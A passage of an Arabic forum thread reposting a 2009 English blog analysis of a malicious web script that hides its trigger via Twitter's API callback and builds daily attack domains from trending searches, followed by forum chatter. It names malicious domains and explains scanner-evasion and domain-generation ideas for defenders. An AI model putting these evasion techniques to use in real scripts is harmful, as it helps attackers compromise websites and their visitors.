” site that Google lists as suspicious. The domain name is currently parked and shouldn’t be able to serve malicious payloads, but a few month ago this attack was active and according to this Wepawet report it served two exploits that used vulnerabilities in AOL’s SuperBuddy ActiveX and Apple QuickTime.

Twitter API in the malicious script

What makes this script interesting is the use of Twitter API.

1

It makes the whole script look less suspicious after the first round of manual deobfuscation.

2

In the obfuscated script, the function that does all the bad things is not explicitly called anywhere. This can prevent scanners that follow execution paths from detecting the malicious code. To call the malicious function, hackers use the “callback” feature of Twitter API. They pass the name of their function as a callback parameter ...weekly.json?callback=callback... As a result, Twitter returns JavaScript that explicitly calls the hacker-defined function passing the trend data an incoming parameter of that function, which triggers the malicious iframe injection.

callback({"trends":{"2009-11-03":[{"name":"Halloween","query":"Halloween"},...]},"as_of":1257850226})

3

Hackers could simply ignore everything Twitter passes to the callback function, but they found a creative way to use Twitter trends. The
fbcmfir .com
domain is used as a default source of badness. At the same time the malicious script tries to use a new domain name every day. They use a very elaborate algorithm to construct new domain names based on multiple parameters such as current day, month and year. To make the domain name generation less predictable, they use the code of the second character in the Twitter search that was the most popular two days earlier. This way they have one day to register a new domain name that will be active the next day.

For example, today is November 11, 2009. Two days ago the most popular Twitter search was “
Jedward
“. The second character is “e” and its code is
101
. The hacker’s algorithm will generate the “
ghoizwvlev .com
” domain name.

Here are a few more examples of generated domain names:
abirgqvlev .com
,
fgxhzgvlev .com
,
abxhcgvlev .com
(in November they all end in lev). As you can see, the generated domain names are almost guaranteed to be available for registration.

However, something went wrong for hackers and this attack seems to be inactive now. I checked many generated domain names and only one of them was actually registered (the site currently reports internal errors though). I guess the approach was too laborious – you have to keep track of Twitter top searches and manually register and configure new domain names every day. At the same time this approach provides the same timeframe for security organizations to blacklist tomorrow’s malicious domain names.

Nonetheless, this is probably the most creative malicious script I’ve seen so far. Luckily for us, it was not very well thought out. (BTW, the domain name generation algorithm is buggy – it fails on certain days. Looks like bugs are pretty common for hacker software.)

To webmasters

1

At this point I don’t have reliable information about this attack, but it’s always a good idea to scan your local computers for malware and then change FTP passwords.

2

If you find anything in your web pages that you don’t remember to have put there – it should be suspicious. Especially if the strange code is outside of the
<html>…</html>
block (this is a sign that the code was added by someone who is not familiar with your site). And don’t be fooled by well-known names such as Google, Yahoo or Twitter. It’s your site, and only you have right to modify it.

مع أن المقالة في نوفمبر 2009 إلا أنها لا زالت حية :D

-------------------------------------------------------------------------------------

مصادر و بعض الروابط:

1- رابط الوزير على الـ Facebook

http://www.facebook.com/home.php?#!/profile.php?id=1820894095

2- رابط الوزير على الـ twitter

http://twitter.com/abdlazizkhoja

3- رابط المقال المقتبس - Hackers Use Twitter API To Trigger Malicious Scripts

http://blog.unmaskparasites.com/2009/11/11/hackers-use-twitter-api-to-trigger-malicious-scripts

4- مقالة Twitter API Still Attracts Hackers

http://blog.unmaskparasites.com/2009/12/09/twitter-api-still-attracts-hackers

-------------------------------------------------------------------------------------

:)

تم تعديل هذه المشاركة بواسطة merouane في 30 مايو 2010 في 18:38

3
#2

سلمت يمينك أخي مروان :) مش أحلى من نشر الكتب بالذمة :D

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#3
Xacker كتب:

سلمت يمينك أخي مروان :) مش أحلى من نشر الكتب بالذمة :D

الله يسلمك

بخصوص الكتب لقد لمستَ ما أغاضني في الأيام السابقة حتى ترددت في الكتابة هنا

لأنني تعبت في تجميعها (حتى من مالي الخاص) و آه على ترتيبها .. ثم تختفي بدون توضيح خفيف ... و ضاع الجهد

لكن ماعليش .. كانت نيتي حسنة

:)

تم تعديل هذه المشاركة بواسطة merouane في 30 مايو 2010 في 01:46

#4

المكتبة... آه فعلاً لم أنتبه لاختفائها لأني لا أشارك حالياً كالسابق في المنتدى بسبب العمل والامتحانات.

سأستفسر من الأخ الشمري حول ما جرى لأنه من قام بإعادة ترتيب الأقسام بالشكل الجديد وربما تكون سقطت سهواً  :lol: لكن أكيد لم تحذف هذا مما لا شك فيه.

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#5
Xacker كتب:

المكتبة... آه فعلاً لم أنتبه لاختفائها لأني لا أشارك حالياً كالسابق في المنتدى بسبب العمل والامتحانات.

سأستفسر من الأخ الشمري حول ما جرى لأنه من قام بإعادة ترتيب الأقسام بالشكل الجديد وربما تكون سقطت سهواً  :lol: لكن أكيد لم تحذف هذا مما لا شك فيه.

شكرا لاهتمامك أخي و بارك الله فيك

:)

مواضيع مشابهة